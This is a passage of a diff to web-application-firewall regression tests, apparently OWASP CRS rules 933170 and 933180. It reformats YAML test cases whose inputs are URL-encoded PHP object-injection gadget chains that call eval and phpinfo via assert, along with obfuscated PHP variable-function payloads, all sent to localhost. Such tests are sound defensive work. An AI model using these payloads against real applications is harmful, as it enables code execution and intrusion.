"933170" + - test_id: 4 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-5 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 5 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-6 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 6 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-7 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 7 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize6" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-8 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize6" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 8 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize7" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-9 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize7" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 9 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize8" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-10 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize8" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 10 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize9" - version: "HTTP/1.1" - output: - log_contains: id "933170" + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize9" + version: "HTTP/1.1" + output: + log_contains: id "933170" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index 570c68e4b..4e685ebfd 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -2,582 +2,544 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933180.yaml tests: - - test_title: 933180-1 + - test_id: 1 desc: PHP variable functions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=" - version: "HTTP/1.1" - output: - no_log_contains: id "933180" - - test_title: 933180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=" + version: "HTTP/1.1" + output: + no_log_contains: id "933180" + - test_id: 2 desc: $a(1) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24a%281%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24a%281%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 3 desc: $$b(2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%24b%282%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24%24b%282%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 4 desc: $_(3) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24_%283%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24_%283%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 5 desc: '@$__[o](4)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%40%24__%5Bo%5D%284%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%40%24__%5Bo%5D%284%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 6 desc: $__['o'](5) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%27o%27%5D%285%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%27o%27%5D%285%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 7 desc: $__[@o](6) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40o%5D%286%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%40o%5D%286%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 8 desc: $__[$_[1]](7) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 9 desc: $__[@$c](8) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40%24c%5D%288%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%40%24c%5D%288%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 10 desc: $d['o'](9) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24d%5B%27o%27%5D%289%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: '%24d%5B%27o%27%5D%289%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 11 desc: ${@a}(10) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%7B%40a%7D%2810%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24%7B%40a%7D%2810%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 12 desc: ${'a'}(11) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?foo=%24%7B%27a%27%7D%2811%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?foo=%24%7B%27a%27%7D%2811%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 13 desc: ${@$b}(12) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%40%24b%7D%2812%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B%40%24b%7D%2812%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 14 desc: ${$s20}['q53b3a6'](13) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 15 desc: $GLOBALS['cf908275'](14) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 16 desc: $OOO000000{0}(15) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'c=%24OOO000000%7B0%7D%2815%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'c=%24OOO000000%7B0%7D%2815%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 17 desc: $OOO0000O0 (16) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24OOO0000O0%20%2816%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24OOO0000O0%20%2816%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 18 desc: $_aB_4c[5]['d'] /*lol*/ (17) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 19 desc: $_aB_4c[@5]/*wat*/[@d] (18) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 20 desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 21 desc: $___[@-_](20) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24___%5B%40-_%5D%2820%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24___%5B%40-_%5D%2820%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 22 desc: '@$___[@!+_](21)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 23 desc: $b374k=@$s_func(22) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24b374k%3D%40%24s_func%2822%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 